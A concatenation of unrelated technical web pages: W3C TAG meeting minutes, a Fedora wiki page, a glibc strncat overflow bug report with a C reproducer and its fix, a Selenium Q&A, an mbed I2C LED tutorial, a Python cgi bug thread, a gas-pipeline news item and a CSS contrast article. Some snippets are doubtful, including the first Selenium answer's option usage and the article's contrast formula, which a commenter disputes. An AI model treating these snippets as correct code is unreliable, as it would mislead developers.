TB: At ftf meeting, we can discuss how to build findings and how to work with people to incorporate. 15:40:05 [Ian] q? 15:40:10 [Ian] ack TBray 15:40:11 [David] q+ 15:40:37 [Ian] DC: The example used recently - Google API - you can use with GET or SOAP. 15:41:04 [Ian] DC: I would like (SOAP) specs to be clear that SOAP is not expected to be used for GET-like operations (e.g., get the weather). 15:41:26 [Ian] CL: The document primarily talks about HTTP. And talks about GET (but not safe methods). 
15:41:55 [Ian] CL: It seems to me that one thing missing from finding - protocols should indicate their safe methods. 15:42:10 [Stuart] q? 15:42:26 [Ian] DC: SOAP is not a w3c-defined vocab of methods. "Make your own" 15:42:33 [Ian] DC: There are bindings to transport protocols. 15:42:51 [Ian] CL: If you see a new protocol you haven't met before, you should have a mechanism for querying whether a method is safe. 15:43:01 [Ian] RF: E.g., include a label in envelope? 15:43:05 [Ian] CL: Yes, for example. 15:43:24 [Ian] CL: In short: move away from the word "GET" and use "safe" instead. 15:43:27 [Ian] q? 15:43:31 [Ian] ack Chris 15:43:55 [TBray] q+ 15:44:24 [Ian] DO: I put a proposal out that one of the ways to handle this for the TAG to issue a finding that hiding everything behind POST isn't sufficient, and the TAG would like something more Web-friend (URIs and GET) and we'd like the WSA WG to deal with this issue. 15:44:48 [Ian] DO: The WSA WG has responsibility for glossary, examples, charters, etc. 15:45:13 [Ian] DO: This is not part of charter for SOAP 1.2. We could ask WSA to make this a high priority for later versions. 15:45:25 [Stuart] q? 15:45:28 [DanCon] sounds mostly good, but the "merry path" should include some "NOTE: this is an issue SOAP 1.2 doesn't address; stay tuned" stuff in the SOAP 1.2 spec 15:45:55 [Stuart] ack David 15:46:22 [Ian] TB: I think that this is the best way forward for process. I'm left with a grave concern for timing. What worries me is that huge amounts of info disappear behind POST> 15:47:00 [Ian] TB: Damage will be done if SOAP 1.2 goes to Rec creating an all-POST environment for Web services. 15:47:07 [Ian] q? 15:47:11 [Ian] ack TBary 15:47:25 [TBray] q- 15:47:33 [Ian] SW: People asking how to integrate GET. Responses have been "You could do that, but that wouldn't be very useful." 15:47:35 [David] q+ 15:47:57 [Ian] SW: The WG is working on the document. There is a small window of opportunity. 15:48:49 [Stuart] q? 
15:48:52 [Ian] CL: Problem is if SOAP 1.3 is produced with safe methods but SOAP 1.2 meets everyone's needs adequately. 15:50:06 [Ian] DO: Things the WSA WG will be interesting to the Web services community (e.g., reliable methods). Therefore, I think a next version of SOAP with cool features including safe methods will not get lost. 15:50:40 [Ian] RF: In the IETF, the IESG can add a note at the beginning of the spec to say that additional work is going on to take care of issues a/b/c. 15:51:09 [DanCon] hmm... I don't think delaying SOAP 1.2 for this is the best idea, but the idea that stuff after SOAP 1.2 will get noticed... I wonder... there's a LOT of stuff being built now that cites SOAP 1.1. 15:51:26 [Ian] TB: HTTP/1.1 has been slow to catch on. 15:51:30 [Ian] q? 15:51:43 [Ian] q+ 15:52:17 [DanCon] RF/CL disagree with TB about speed of HTTP/1.1 15:52:33 [Ian] DO: What does the TAG think the XMLP WG should do with SOAP 1.2. I'm strongly arguing that the WG should be able to make progress (as is). 15:52:37 [Ian] ack David 15:54:15 [TBray] q+ 15:54:55 [Ian] ack Ian 15:55:20 [Ian] IJ: I think that TAG should provide comprehensive explanation of issue. Let larger community reach consensus as part of regular W3C process. 15:55:22 [Ian] ack TBary 15:55:24 [Ian] ack TBray 15:55:39 [Ian] TB: I think this is a problem that is not hard to solve technologically. 15:55:59 [Ian] TB: Do some people think it's much harder than what I've described elsewhere? 15:56:33 [Ian] TB: Wouldn't cover all of SOAP (e.g., not N-space conversations). 15:56:47 [Ian] DO: How do RF and DC feel about this type of solution. 15:56:49 [Ian] DC: It's good. 15:56:50 [DanCon] as to the idea that this issue is coming in late, I notified the XMLP WG of this issue, via Yves, when they were drafting their requirements. R612 15:58:51 [Ian] TB: Paul Prescod wrote an xml.com article about google - they published an API where there used to be a URI. 
The google result space vanishes from URI space as a result. Paul argues why the URI version was better for a lot of reasons. 15:59:02 [Ian] DO: I thought the article was well-written. 15:59:31 [Ian] 15:59:37 [TBray] 16:00:08 [Ian] DC: It would help me if DO said which way Google should have done it - it was done with GET and they switched. If there isn't agreement that it was better done with GET, I don't know how to write the finding. 16:00:53 [Ian] DO: I think that GET could be used for some of the SOAP calls. I don't like raising the case for using POST in general. But in the case of google, I think it's a fine usage of GET. 16:01:39 [Zakim] -DanC 16:02:00 [Ian] Adjourned 16:02:02 [Zakim] -Roy 16:02:04 [Zakim] -TBray 16:02:08 [Zakim] -Ian 16:02:10 [Zakim] -N.Walsh 16:02:10 [Zakim] -Stuart? 16:02:30 [Ian] RRSAgent, stop
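(A later illustration, not part of the minutes: the I18N hazard CL and RF were debating above, non-ASCII form data percent-encoded into a GET query string, can be reproduced with any URL library. The Python below is purely for demonstration; which octets end up in the URI depends on the character encoding chosen, which is exactly RF's transcoding point.)

```python
from urllib.parse import urlencode, parse_qsl

# One form field holding a non-ASCII value, encoded into a GET query
# string under two different character encodings.
params = {"q": "café"}

utf8_query = urlencode(params, encoding="utf-8")      # q=caf%C3%A9
latin1_query = urlencode(params, encoding="latin-1")  # q=caf%E9

# Same logical value, different octets in the URI: a server that
# assumes one encoding will mis-decode a client using the other.
assert utf8_query != latin1_query
assert dict(parse_qsl(utf8_query, encoding="utf-8")) == params
assert dict(parse_qsl(latin1_query, encoding="latin-1")) == params
```

Percent-encoding itself is lossless; the ambiguity is only over which encoding produced the octets, which is why "fix the I18N problem" (TB) and "transcoding breaks the octets" (RF) are both consistent with the behaviour shown here.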
http://www.w3.org/2002/04/29-tagmem-irc.html
Tools used by the Docs Project From FedoraProject Documentation Project Tools We need a place to discuss our tools. Here are some blank Wiki pages we can fill. - DocsProject/Tools/ - The page you are staring at is probably all we need, but feel free to (ab)use the DocsProject/Tools/ namespace, eh. - DocsProject/Tools/Usage - Oh, yeah, wouldn't it be cool to tell people HOW to use our tools? Whee! - KarstenWade If you have any questions, please join the list and ask . Writing Plain Text and Email Ideas and first drafts are often written in plain text in the writer's favorite text editor. Concepts, snippets, and first drafts are passed around via email. This practice is a bit old school now, as the wiki has become the preferred draft/scratch space. Wiki The wiki is a good tool for collaborative community documentation. Easy to edit, version controlled, instant rendering, and flexible enough to allow for mind mapping . The Docs team uses the wiki as a place to draft documents before converting them to DocBook XML and putting them under standard source control management. The wiki is an easy way to gather a large amount of raw data, such as the Docs/Beats where the release notes are drafted. A wiki is a low barrier for entry with a low learning curve. Basic pages are easy to make, and more advanced instructions allow us to make documents that are more easily ported to other formats , such as XML. Gobby Gobby is a real time collaborative editing tool. One or more writers can work on a shared document at the same time, with each writer having a unique color to their writing. Writers can write around each other, correcting, adding, and changing the document at the same time. There is an associated chat window for coordination, although many times we continue in IRC instead. DocBook XML Writing whole books in DocBook XML is the best way to get the full advantage of this tool. 
The Docs team uses this format to support publishing documents over the long term in multiple languages. DocBook has a rich semantic markup that allows a document to be useful for much more than reading. The Docs team has a set of [#Build_Tools build tools] to manipulate the XML files for translating, styling, and converting to other formats (HTML, PS, PDF, TXT).

Build Tools

Currently FDP uses a customized Makefile, with parts that live with each document that define local variables, and a Makefile-common that lives in the docs-common module in CVS. Our toolchain is specifically designed to be used as a generic documentation system. This is in line with the project goal of providing a 100% FLOSS documentation toolchain that works within a standard installation of Fedora.

To build a document, you need the document's module from CVS and the docs-common module. A good module to look at first is the example-tutorial. Its purpose is to be a buildable bare template tutorial. You can obtain it via anonymous CVS:

export CVSROOT=:pserver:anonymous@cvs.fedoraproject.org:/cvs/docs
cvs -z3 login
cvs -z3 co docs-common example-tutorial
http://fedoraproject.org/wiki/Tools_used_by_the_Docs_Project
Apparently, on x86_64 (and other archs?) the asm version of strncat has an integer overflow similar to bug 19387. sysdeps/x86_64/multiarch/strcat-sse2-unaligned.S is used on my machine. I didn't look into the details but it looks like strncat(s1, s2, n) misbehaves when n is near SIZE_MAX, strlen(s2) >= 34 and s2 has a specific offset. For example, the program:

----------------------------------------------------------------------
#include <stdint.h>
#include <stdalign.h>
#include <string.h>
#include <stdio.h>

int main()
{
    alignas(64) char s[144];
    memset(s, 1, sizeof s);

    /* the first string... */
    char *s1 = s;                      /* ...is at the start of the buffer */
    s1[0] = 0;                         /* ...and is empty */

    /* the second string... */
    char *s2 = s + 95;                 /* ...starts at pos 95, */
    memset(s2, 2, s + sizeof s - s2);  /* ...filled with 2s for contrast */
    s2[33] = 0;                        /* ...and has the length 33 */

    printf("before:\n");
    for (int i = 0; i < 50; i++)
        printf("%x", (unsigned char)s[i]);
    printf("...\n");

    strncat(s1, s2, SIZE_MAX);

    printf("after:\n");
    for (int i = 0; i < 50; i++)
        printf("%x", (unsigned char)s[i]);
    printf("...\n");
    printf("%-33s^\n", "the string should end here");
}
----------------------------------------------------------------------

outputs this:

----------------------------------------------------------------------
before:
01111111111111111111111111111111111111111111111111...
after:
22222222222222222222222222222222202222211111111111...
the string should end here       ^
----------------------------------------------------------------------

Here, strncat put '\0' exactly where it should be but also copied 5 extra chars from s2 into s1 after '\0'. In other cases it copies fewer chars than required.

Checked on x86_64:
- git master (glibc-2.22-616-g5537f46) -- failed;
- Debian jessie (glibc 2.19-18+deb8u1) -- failed;
- Debian wheezy (eglibc 2.13-38+deb7u8) -- ok.

Checked on x86_64 with gcc -m32:
- Debian jessie (glibc 2.19-18+deb8u1) -- failed;
- Debian wheezy (eglibc 2.13-38+deb7u8) -- ok.
I didn't look into the details of 32-bit version. The bug can have evident security implications but using strncat with n=SIZE_MAX seems rare hence filing it publicly. I tried your code on ppc 32-bit, with glibc 2.20 as I didn't have 2.22 available. $ file bug bug: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, not stripped $ ./bug before: 01111111111111111111111111111111111111111111111111... after: 22222222222222222222222222222222201111111111111111... the string should end here ^ Tried the sample-code on ARM (Cortex A9) running Ubuntu 12.04. gcc 4.6.3 complained about missing stdalign.h. So had to replace alignas(64) char s[144]; with __attribute__ ((aligned (64))) char s[144]; (hopefully the replacement works as intended.) gcc test-strncat.c -std=c99 -o test-strncat gcc --version gcc (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3 file test-strncat test-strncat: ELF 32-bit LSB executable, ARM, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.31, BuildID[sha1]=0xb88137c1de1a1f534311ba81b1f403166b1091f1, not stripped ./test-strncat before: 01111111111111111111111111111111111111111111111111... after: 22222222222222222222222222222222201111111111111111... the string should end here ^ So works properly, no issues, right? Possible duplicate of BUG 17279 () $ file a.out a.out: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8730e4750909db3ae281264c026e8ceb6ec4a140, not stripped $ pacman -Q | grep glibc glibc 2.22-3 lib32-glibc 2.22-3.1 $ ./a.out before: 01111111111111111111111111111111111111111111111111... after: 22222222222222222222222222222222202222211111111111... 
the string should end here ^ This is on: Arch Linux 4.2.5-1-ARCH #1 SMP PREEMPT Tue Oct 27 08:13:28 CET 2015 x86_64 GNU/Linux Created attachment 8866 [details] Test strncat for all offsets (In reply to howey014 from comment #1) > I tried your code on ppc 32-bit, with glibc 2.20 as I didn't have 2.22 > available. (In reply to cvs268 from comment #2) > Tried the sample-code on ARM (Cortex A9) running Ubuntu 12.04. [skip] > So works properly, no issues, right? Thanks for testing it on different archs. Yes, this particular test is fine. I attached a fuller test which tries all offsets and all lengths upto 64 (you can change it to 128 if you want). It will either print "Ok" or details of the first found fail. Please try it on your platforms. (In reply to Xavier Roche from comment #3) > Possible duplicate of BUG 17279 > () Yes, seems to be the same. So, this bug is not merely theoretical but is triggered by real code. Is your code open source / publicly available? *** Bug 17279 has been marked as a duplicate of this bug. *** This is an automated email from the git hooks/post-receive script. It was generated because a ref change was pushed to the repository containing the project "GNU C Library master sources". The branch, master has been updated via 8dad72997af2be0dc72a4bc7dbe82d85c90334fc (commit) from d4d629e6187e33050902824a94498b6096eacac9 (commit) Those revisions listed above that are new to this repository have not appeared on any other notification email; so we list those revisions in full, below. - Log -----------------------------------------------------------------;h=8dad72997af2be0dc72a4bc7dbe82d85c90334fc commit 8dad72997af2be0dc72a4bc7dbe82d85c90334fc Author: Adhemerval Zanella <adhemerval.zanella@linaro.org> Date: Tue Jan 3 12:19:12 2017 -0200 Fix x86 strncat optimized implementation for large sizes Similar to BZ#19387, BZ#21014, and BZ#20971, both x86 sse2 strncat optimized assembly implementations do not handle the size overflow correctly. 
The x86_64 one is in fact an issue with strcpy-sse2-unaligned, but that is triggered also with strncat optimized implementation. This patch uses a similar strategy used on 3daef2c8ee4df2, where saturared math is used for overflow case. Checked on x86_64-linux-gnu and i686-linux-gnu. It fixes BZ #19390. [BZ #19390] * string/test-strncat.c (test_main): Add tests with SIZE_MAX as maximum string size. * sysdeps/i386/i686/multiarch/strcat-sse2.S (STRCAT): Avoid overflow in pointer addition. * sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S (STRCPY): Likewise. ----------------------------------------------------------------------- Summary of changes: ChangeLog | 10 ++++++++++ string/test-strncat.c | 15 +++++++++++++++ sysdeps/i386/i686/multiarch/strcat-sse2.S | 2 ++ sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S | 2 ++ 4 files changed, 29 insertions(+), 0 deletions(-) Fixed by 8dad72997af2be.
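As a side note for readers reconstructing the expected behaviour: the semantics the new tests check can be modelled in a few lines. This is a Python reference model of C strncat written for this report, not glibc code.

```python
# Reference model of C strncat(s1, s2, n): append at most n bytes of s2
# to s1, then always NUL-terminate.  n near SIZE_MAX must behave like
# "unbounded"; the overflow in the SSE2 code broke exactly that.
SIZE_MAX = 2**64 - 1

def strncat(s1: bytes, s2: bytes, n: int) -> bytes:
    dest = s1[:s1.index(b"\0")]      # everything up to s1's terminator
    src = s2[:s2.index(b"\0")][:n]   # at most n bytes of s2
    return dest + src + b"\0"

# The bug report's scenario: empty s1, a 33-byte s2, n == SIZE_MAX.
s1 = b"\0"
s2 = b"\x02" * 33 + b"\0"
out = strncat(s1, s2, SIZE_MAX)
assert out == b"\x02" * 33 + b"\0"   # 33 bytes copied, then NUL, nothing extra
```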
https://sourceware.org/bugzilla/show_bug.cgi?id=19390
I was automatically downloading links using selenium with chrome driver and python. How can I select the download directory through the python program so that it does not get downloaded in the default Downloads directory?

Create a profile for chrome and define the download location for the tests. Below is an example:

from selenium import webdriver
options = webdriver.ChromeOptions()
options.add_argument("download.default_directory=C:/Downloads")
driver = webdriver.Chrome(chrome_options=options)

Hey @Shan, I'm not too confident about doing it that way. There is no use case for this scenario. From what I know, to change the default download location, you need to update the profile default settings by setting preferences. We use ChromeOptions in Chrome to update the preferences, in Firefox we use FirefoxProfile and for doing it in IE, we use DesiredCapabilities. The challenge however is, we cannot update the preferences during execution because it requires a restart of the ChromeDriver instance. And if we restart ChromeDriver, our session will get terminated. Hence this is a no-show. However, an alternative could be that you set the download-to-path in the code itself. But I must warn you, it will be extremely challenging to write the logic for the download path to change for every download. But it's worth giving a shot.
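(Added for completeness, and to be verified against your Chrome/ChromeDriver version: the preference-based mechanism the second reply describes is usually expressed by attaching a "prefs" dictionary to ChromeOptions before the driver starts. The helper name below is made up for illustration.)

```python
def download_prefs(directory):
    # Chrome profile preferences controlling where files are saved.
    # These are read from the profile when Chrome starts, which is why
    # they cannot be changed mid-session without restarting the driver.
    return {
        "download.default_directory": directory,
        "download.prompt_for_download": False,
    }

# With Selenium the dict would be attached like so (not run here):
#   options = webdriver.ChromeOptions()
#   options.add_experimental_option("prefs", download_prefs("C:/Downloads"))
#   driver = webdriver.Chrome(chrome_options=options)

prefs = download_prefs("C:/Downloads")
assert prefs["download.default_directory"] == "C:/Downloads"
```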
https://www.edureka.co/community/9694/download-specified-location-through-selenium-chrome-driver?show=9702
This page is intended to show the PCA9532 - what it can do, how it works, how to interface it, and how an API can be built for it.

The PCA9532 is an I2C IO expander. It has 16 open drain output pins that are designed to drive LEDs. Each pin can sink 25mA, and can be set to ON, OFF, or blink at one of two programmable rates. The rates are global and have fully programmable period and duty cycle. The achievable blink rate ranges from 0.6Hz to 152Hz, with duty cycle from 0 to 100% in 256 steps.

The PCA9532 device is well documented on the NXP website, which gives links to where to buy it, data sheets and so on.

As ever, the first thing to do is to establish some kind of communication with the PCA9532. A brief look through the datasheet suggests that the easiest thing to do is write to the LED selector register to turn some LEDs on and off. I will do this using the I2C library. The datasheet for this part defines the default address to be 0xC0, and as all three user defined address bits (A2-0, pins 1-3 on the chip) are set to zero, this is the final address for this experiment.

#include "mbed.h"

I2C i2c (p28,p27);

int main() {
    char i2c_data[2];
    while (1) {
        // clear LS0 to turn LED0-3 off
        i2c_data[0] = 0x06; // LS0 register
        i2c_data[1] = 0x00; // all off
        i2c.write(0xC0,i2c_data,2);
        wait (0.2);

        // Set LS0 to 0x55 to turn LED0-3 on
        i2c_data[0] = 0x06; // LS0 register
        i2c_data[1] = 0x55; // all on
        i2c.write(0xC0,i2c_data,2);
        wait (0.2);
    }
}

Great! First time around, I got exactly what I was hoping for. The four pins LED0-3 all toggle on and off happily. Now we're communicating with the PCA9532, we'll look at the registers, addressing, bus transactions, and how to build an API for this.
This bottom bit is overwritten as needed in the mbed library call for read and write. So the top nibble of the address is 0xC, with the bottom nibble being made from the three-bit user address and the read/write bit, which is actually a "don't care".

The functionality of the PCA9532 is controlled by reading and writing the 10 registers of the PCA9532. The registers are pretty straightforward in what they do, and are listed below (register numbers and names from the datasheet):

0x00 INPUT0 - input state of LED0-7 (read only)
0x01 INPUT1 - input state of LED8-15 (read only)
0x02 PSC0 - frequency prescaler 0
0x03 PWM0 - duty cycle 0
0x04 PSC1 - frequency prescaler 1
0x05 PWM1 - duty cycle 1
0x06 LS0 - LED0-3 selector
0x07 LS1 - LED4-7 selector
0x08 LS2 - LED8-11 selector
0x09 LS3 - LED12-15 selector

We've already seen that writing to the PCA9532 registers behaves as we'd expect, but reading is slightly different. The PCA9532 uses a control byte, which is essentially just the register address. A write is therefore just the control byte followed by the data. A read is slightly different than initially expected. To read from a register, first its address must be written to the control byte with an I2C write. The read operation following the write to the control byte then returns the contents of the addressed register.

Write : control byte (register number), then the data byte
Read : an I2C write of the control byte (register number), then an I2C read that returns the data byte

The intention is to build up a C++ class for the PCA9532 so that it can be specified by pin connection and address, and then controlled in terms of the LED behaviour. Since all of the functionality is controlled through register access, the first step is to build simple methods that give a logical abstraction to the registers, which leads to the following API definition:

class PCA9532 {
public:
    PCA9532(PinName sda, PinName scl, int addr);

protected:
    void _write(int reg, int data);
    int _read(int reg);

    int _addr;
    I2C _i2c;
};

The read and write functions are fairly straightforward to define using the bus transactions described above:

void PCA9532::_write(int reg, int data) {
    char args[2];
    args[0] = reg;
    args[1] = data;
    _i2c.write(_addr, args, 2);
}

int PCA9532::_read(int reg) {
    char args[2];
    args[0] = reg;
    _i2c.write(_addr, args, 1);
    _i2c.read(_addr, args, 1);
    return(args[0]);
}

Now that we have these in place, all our actual behaviour is a matter of setting registers accordingly.
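The address byte arithmetic described above is simple enough to model directly (Python used here just to make the bit layout concrete; the function name is invented):

```python
def pca9532_address(a2, a1, a0):
    # Top nibble fixed at 0xC; user pins A2..A0 fill bits 3..1; bit 0
    # is the R/W bit, which the I2C library overwrites per transaction.
    return 0xC0 | (a2 << 3) | (a1 << 2) | (a0 << 1)

# All address pins tied low gives the 0xC0 used in the experiment above.
assert pca9532_address(0, 0, 0) == 0xC0

# Eight devices can share a bus: addresses 0xC0, 0xC2, ... 0xCE.
assert [pca9532_address((i >> 2) & 1, (i >> 1) & 1, i & 1) for i in range(8)] \
       == [0xC0, 0xC2, 0xC4, 0xC6, 0xC8, 0xCA, 0xCC, 0xCE]
```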
All of our behaviour can be split into configuring the PWM channels (period, duty cycle) and selecting one of the four modes for each LED (Off, On, Pwm0, Pwm1). The way to expose this that seems to make sense is to manipulate one LED, or all at once, e.g. Adding in the need to configure PWM channels, the rest of the API looks like this :

int SetLed (int led, int mode);
int SetMode (int mask, int mode);
int Duty (int channel, float duty);
int Period (int channel, float period);

The code to do this has been implemented in the following library:

A hello world program for this library:

This hello world example has a Cheat Sheet for the Embedded Artists Baseboard
http://mbed.org/users/chris/notebook/pca9532---i2c-led-dimmer/
Created on 2005-01-31 00:58 by irmen, last changed 2008-06-02 03:15 by hdiogenes.

Logged In: YES user_id=469548
Here's a patch. We're interested in two things in the patched loop: * the rest of the multipart/form-data, including the headers for the current part, for consumption by HeaderParser (this is the tail variable) * the rest of the multipart/form-data without the headers for the current part, for consumption by FieldStorage (this is the message.get_payload() call) Josh, Irmen, do you see any problems with this patch? (BTW, this fix should be ported to the parse_multipart function as well, when I check it in (and I should make cgibug.py into a test))

Logged In: YES user_id=693077
Johannes, your patch looks fine to me. It would be nice if we didn't have to keep reading back each part from the parsed message, though. I had an idea for another approach. Use email to parse the MIME message fully, then convert it to FieldStorage fields. Parsing could go something like:

== CODE ==
from email.FeedParser import FeedParser

parser = FeedParser()
# Create bogus content-type header...
parser.feed('Content-type: %s ; boundary=%s \r\n\r\n' % (self.type, self.innerboundary))
parser.feed(self.fp.read())
message = parser.close()
# Then take parsed message and convert to FieldStorage fields
== END CODE ==

This lets the email parser handle all of the complexities of MIME, but it does mean that we have to accurately re-create all of the necessary headers. I can cook up a full patch if anyone thinks this would fly.

Logged In: YES user_id=129426
Johannes: while your patch makes my cgibug.py test case run fine, it has 2 problems: 1- it runs much slower than the python2.4 code (probably because of the reading-back thing Josh is talking about); 2- it still doesn't fix the second problem that I observed: cgi.FieldStorage never completes when fp is a socket. I don't have a separate test case for this yet, sorry. So Josh: perhaps your idea doesn't have these 2 problems?
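Josh's FeedParser idea above can be tried standalone. The sketch below uses the Python 3 module path (email.feedparser; it was email.FeedParser in the Python 2 of this thread) and a made-up boundary and body, so it only illustrates the parsing approach, not the cgi integration:

```python
from email.feedparser import FeedParser  # email.FeedParser in Python 2

# Reconstruct a bogus top-level header so the email package knows the
# boundary, then feed it a small hand-written multipart/form-data body.
parser = FeedParser()
parser.feed("Content-Type: multipart/form-data; boundary=XX\r\n\r\n")
parser.feed(
    "--XX\r\n"
    'Content-Disposition: form-data; name="field1"\r\n'
    "\r\n"
    "hello\r\n"
    "--XX--\r\n"
)
message = parser.close()

# The parsed message is a multipart with one part whose payload is the
# form field's value; FieldStorage fields would be built from these.
assert message.is_multipart()
parts = message.get_payload()
assert len(parts) == 1
assert parts[0].get_payload().strip() == "hello"
```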
Logged In: YES user_id=693077
Irmen, can you try to create a test case where the cgi.FieldStorage never completes, so I can make sure that any fix I come up with resolves it? I will try to put together an implementation where the email parser parses the whole multipart message.

Logged In: YES user_id=129426
Yes, I'll try to make a test case for that within the next few days.

Logged In: YES user_id=129426
I've added a test that shows the 'freezing' problem I talked about. Start the server.py, it will listen on port 9000. Open the post.html in your web browser, enter some form data, and submit the form. It will POST to the server.py and if you started that one with cvs-python (2.5a0) it will freeze on the marked line. If you start server.py with Python 2.4, it will work fine.

Logged In: YES user_id=693077
I've been playing with using the email parser to do the whole job of parsing the data, and I think it's too big of a change. It'd be very hard to ensure API compatibility and the same behaviour. I think that in the long run, it's the right thing to do, but I think that the API should change when that change is made. My recommendation for the time being is to revert the original patch that I made.

Logged In: YES user_id=4771
The problem is still there now (5 months later), so should I go ahead and revert the cgi.py changes of r1.83? It does break user code out there.

Logged In: YES user_id=129426
I vote for revert, so that my code may run again on Python 2.5. Also see Josh's comment, with which I agree.

Logged In: YES user_id=693077
Yes, please revert the patch.

Logged In: YES user_id=4771
Reverted (Lib/cgi.py r1.85).

Logged In: YES user_id=29957
Er - while reverting it makes the code work again, I'm _really_ unhappy with this as a long-term solution. We really need to be getting rid of the old, unmaintained, and generally awful code of things like mimetools.
> Er - while reverting it makes the code work again, I'm > _really_ unhappy with this as a long-term solution. I've addressed almost everything that's discussed here in issue 2849, implementing Josh's suggestion of using FeedParser. It removes rfc822 (but not mimetools [yet]) dependency from the cgi module, without the parsing problem pointed by cgibug.py and without hanging, as shown in server.py + post.html. Also, preliminary tests revealed that the new FieldStorage.read_multi is about 10 times faster than the old one.
http://bugs.python.org/issue1112856
05 September 2011 17:27 [Source: ICIS news] LONDON (ICIS)--Technical gas would be sent through the pipeline from Tuesday. Putin signalled the start of Nord Stream operations at a meeting of his governing United Russia party. The new €7.4bn ($10.4bn) infrastructure, which takes a route across the Baltic Sea, will help Russia deliver gas to Europe without it having to overcome obstacles caused by the policies of gas transit states through which its old pipelines run, such as the Druzhba, Putin said. On 25 August, the Switzerland-headquartered Nord Stream joint venture announced that the 1,220-kilometre Nord Stream had been connected to the newly built €1bn, 470-kilometre OPAL pipeline. The OPAL runs from Lubmin, via Mecklenburg-Western Pomerania, Brandenburg and Saxony to the Germany-Czech Republic border, where it is to be connected to the €400m Gazela Pipeline, which will deliver Nord Stream gas across central Europe. Nord Stream has a capacity of 55bn cubic metres (cbm) of gas per year, while the capacity of the OPAL is 36bn cbm
http://www.icis.com/Articles/2011/09/05/9490216/russia-to-start-pumping-nord-stream-gas-on-tuesday-putin.html
maintaining a contrast with the foreground color that is high enough (using either white or black) to pass WCAG AA accessibility standards. It's astonishingly efficient to do this in JavaScript with a few lines of code:

var rgb = [255, 0, 0];

function setForegroundColor() {
  var sum = Math.round(((parseInt(rgb[0]) * 299) + (parseInt(rgb[1]) * 587) + (parseInt(rgb[2]) * 114)) / 1000);
  return (sum > 128) ? 'black' : 'white';
}

This takes the red, green and blue (RGB) values of an element's background color, multiplies them by some special numbers (299, 587, and 114, respectively), adds them together, then divides the total by 1,000. When that sum is greater than 128, it will return black; otherwise, we'll get white. Not too bad. The only problem is, when it comes to recreating this in CSS, we don't have access to a native if statement to evaluate the sum. So, how can we replicate this in CSS without one?

Luckily, like HTML, CSS can be very forgiving. If we pass a value greater than 255 into the RGB function, it will get capped at 255. Same goes for numbers lower than 0. Even negative integers will get capped at 0. So, instead of testing whether our sum is greater or less than 128, we subtract 128 from our sum, giving us either a positive or negative integer. Then, if we multiply it by a large negative value (e.g. -1,000), we end up with either very large positive or negative values that we can then pass into the RGB function. Like I said earlier, this will get capped to the browser's desired values.
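The subtract-and-scale trick can be sanity-checked in plain JavaScript by simulating the browser's channel capping with Math.min/Math.max (accessibleChannel is a made-up name for this sketch):

```javascript
// Simulate the CSS trick: compute the YIQ-style brightness sum, shift
// it by -128, scale by -1000, then clamp to 0..255 the way a browser
// clamps rgb() channel values.
function accessibleChannel(r, g, b) {
  const sum = (r * 299 + g * 587 + b * 114) / 1000;
  const scaled = (sum - 128) * -1000;
  return Math.min(255, Math.max(0, scaled)); // browser-style capping
}

// Bright red background: sum ≈ 76, below 128, so the huge positive
// result caps at 255 in every channel -> white text.
if (accessibleChannel(255, 0, 0) !== 255) throw new Error("expected white on red");

// Yellow background: sum ≈ 226, above 128, so the huge negative
// result caps at 0 in every channel -> black text.
if (accessibleChannel(255, 255, 0) !== 0) throw new Error("expected black on yellow");
```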
Here is an example using CSS variables:

:root {
  --red: 28;
  --green: 150;
  --blue: 130;
  --accessible-color: calc(
    (
      (
        (
          (var(--red) * 299) +
          (var(--green) * 587) +
          (var(--blue) * 114)
        ) / 1000
      ) - 128
    ) * -1000
  );
}

.button {
  color: rgb(
    var(--accessible-color),
    var(--accessible-color),
    var(--accessible-color)
  );
  background-color: rgb(
    var(--red),
    var(--green),
    var(--blue)
  );
}

If my math is correct (and it's very possible that it's not) we get a total of 16,758, which is much greater than 255. Pass this total into the rgb() function for all three values, and the browser will set the text color to white. Throw in a few range sliders to adjust the color values, and there you have it: a dynamic UI element that can swap text color based on its background-color while maintaining a passing grade with WCAG AA.

See the Pen CSS Only Accessible Button by Josh Bader (@joshbader) on CodePen.

Putting this concept to practical use

Below is a Pen showing how this technique can be used to theme a user interface. I have duplicated and moved the --accessible-color variable into the specific CSS rules that require it, and to help ensure backgrounds remain accessible based on their foregrounds, I have multiplied the --accessible-color variable by -1 in several places. The colors can be changed by using the controls located at the bottom-right. Click the cog/gear icon to access them.

See the Pen CSS Variable Accessible UI by Josh Bader (@joshbader) on CodePen.

There are other ways to do this

A little while back, Facundo Corradini explained how to do something very similar in this post. He uses a slightly different calculation in combination with the hsl function. He also goes into detail about some of the issues he was having while coming up with the concept. He goes on to mention that Edge wasn't capping his large numbers, and during my testing, I noticed that sometimes it was working and other times it was not.
If anyone can pinpoint why this might be, feel free to share in the comments. Further, Ana Tudor explains how using filter + mix-blend-mode can help contrast text against more complex backgrounds. And, when I say complex, I mean complex. She even goes so far as to demonstrate how text color can change as pieces of the background color change — pretty awesome! Also, Robin Rendle explains how to use mix-blend-mode along with pseudo elements to automatically reverse text colors based on their background-color. So, count this as yet another approach to throw into the mix. It's incredibly awesome that Custom Properties open up these sorts of possibilities for us while allowing us to solve the same problem in a variety of ways.

Pretty clever

This is awesome! I love the pen you made about "Putting this concept to practical use". Thanks for the article!

Where did you get the "special numbers" from? The W3C has them listed here…

I have no idea why but it doesn't work on Gecko 56

The problems with capping numbers may be related to the OS and hardware setup. The way color functions are implemented can easily be dependent on whether the browser has access to hardware acceleration or not. In the past, I have observed similar errors for the "gooey effect" (in this case, the alpha value), although this seems to be resolved by now.

Josh, this is a cool idea but I'm afraid your math is not accurate—neither in the JavaScript nor the CSS. The "special numbers" you refer to are poorly explained on that w3c page. In fact, the red, blue and green need to be first normalized (set in a range from 0 to 1) and then linearized (converted from sRGB to linearRGB) before you pass them into that formula. The latter step is missed in many implementations, including for example Bootstrap's yiq() Sass function, but it is absolutely the only correct calculation and there are w3c and WCAG documents that do correctly reference it.
